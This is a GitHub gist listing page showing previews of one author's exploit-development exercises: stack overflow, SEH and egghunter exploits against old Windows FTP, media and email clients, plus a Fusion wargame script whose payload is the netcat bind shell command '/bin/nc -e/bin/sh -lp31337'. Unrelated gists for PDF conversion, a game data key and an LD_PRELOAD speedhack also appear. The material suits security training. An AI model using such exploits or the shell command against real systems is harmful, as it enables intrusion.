Skip to content

Instantly share code, notes, and snippets.

View synap5e's full-sized avatar

Simon Pinfold synap5e

39 followers · 33 following
View GitHub Profile
@synap5e
synap5e / freefloat_ftp_1_lcd_exploit.py
Created November 9, 2012 23:52
Freefloat FTP Server - "lcd" command stack overflow
import sys, socket, struct
# Freefloat FTP Server - "lcd" command stack overflow
# Version 1.0 - DEP + ASLR disabled
# Tested: Windows XP SP3 - English
# Author: Simon Pinfold
#
# windows/messagebox - 287 bytes
@synap5e
synap5e / soritong_1_m3u_exploit.py
Created November 10, 2012 21:23
Soritong 1.0 Client side exploit (SEH)
#!/usr/bin/python
import os
# Soritong 1.0 Client side exploit (SEH)
# Author: Simon Pinfold
#
# windows/messagebox - 287 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
@synap5e
synap5e / millennium_mp3_studio_2_mpf_exploit.py
Created November 10, 2012 21:25
Millennium mp3 studio 2 SEH
#!/usr/bin/python
import os
# Millennium mp3 studio 2 SEH ".mpf" client side exploit
# Version 2.0 - DEP + ASLR disabled
# Tested: Windows XP SP3 - English
# Author: Simon Pinfold
#badchars 00,1a,0d,0e,0f
space = 1280
@synap5e
synap5e / eureka_email_2_2q_egghunter_err_egghunter_exploit.py
Created November 10, 2012 21:27
Eureka Email 2.2q - "-ERR" Egghunter Exploit
import sys, socket, struct
# Eureka Email 2.2q - "-ERR" Egghunter Exploit
# Version 2.2q - DEP + ASLR disabled
# Tested: Windows XP SP3 - English
# Author: Simon Pinfold
#
# windows/messagebox - 287 bytes
# http://www.metasploit.com
@synap5e
synap5e / eureka_email_2_2q_err_exploit.py
Created November 10, 2012 21:28
Eureka Email 2.2q - "-ERR" Exploit
import sys, socket, struct
# Eureka Email 2.2q - Exploit (non egghunter)
# Version 2.2q - DEP + ASLR disabled
# Tested: Windows XP SP3 - English
# Author: Simon Pinfold
#
# windows/messagebox - 287 bytes
# http://www.metasploit.com
@synap5e
synap5e / easy_rm_to_mp3_2_7_3_700_dep_aslr_exploit.py
Created November 10, 2012 21:29
Easy RM to MP3 Converter - ".m3u" Windows 7 DEP + ASLR Local Exploit
#!/usr/bin/python
# Easy RM to MP3 Converter - Windows 7 DEP + ASLR Local Exploit
# Version 2.7.3.700 on Windows 7
# Tested: Windows 7 Ultimate SP0 - English
# Author: Simon Pinfold
import struct, os
@synap5e
synap5e / pdf_slidedeck_to_pptx.py
Created July 27, 2013 11:09
#!/usr/bin/python
import sys, os
from wand.image import Image
from pptx import Presentation
from pptx.util import Px
pdf = sys.argv[1]
landscape_crops = [
@synap5e
synap5e / cubeworld-data-encoding.py
Created July 28, 2013 01:33
# This array is used to encode and decode the resource files
data_key = [
0x00001092, 0x0000254F, 0x00000348, 0x00014B40, 0x0000241A, 0x00002676,
0x0000007F, 0x00000009, 0x0000250B, 0x0000018A, 0x0000007B, 0x000012E2,
0x00007EBC, 0x00005F23, 0x00000981, 0x00000011, 0x000085BA, 0x0000A566,
0x00001093, 0x0000000E, 0x0002D266, 0x000007C3, 0x00000C16, 0x0000076D,
0x00015D41, 0x000012CD, 0x00000025, 0x0000008F, 0x00000DA2, 0x00004C1B,
0x0000053F, 0x000001B0, 0x00014AFC, 0x000023E0, 0x0000258C, 0x000004D1,
0x00000D6A, 0x0000072F, 0x00000BA8, 0x000007C9, 0x00000BA8, 0x0000131F,
0x000C75C7, 0x0000000D
@synap5e
synap5e / speedhack.cpp
Created February 10, 2014 12:10
A quick hack that allows using LD_PRELOAD for a speedhack
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
typedef int (*go)(struct timeval *tv, struct timezone *tz);
@synap5e
synap5e / bbq.py
Created May 30, 2014 11:53
#!/usr/bin/env python2
target = ('127.0.0.1', 20003)
command = ['/bin/nc', '-e/bin/sh', '-lp31337']
"""
ltrace -i -p `ps -Af | grep level03 | grep -v -e grep -e python | tail -n 1 | cut -c 9-16`
echo attach `ps -Af | grep level03 | grep -v -e grep -e python | tail -n 1 | cut -c 9-16` > .gdbinit && gdb -q -iex "set auto-load safe-path /home/simon/Desktop/fusion"
"""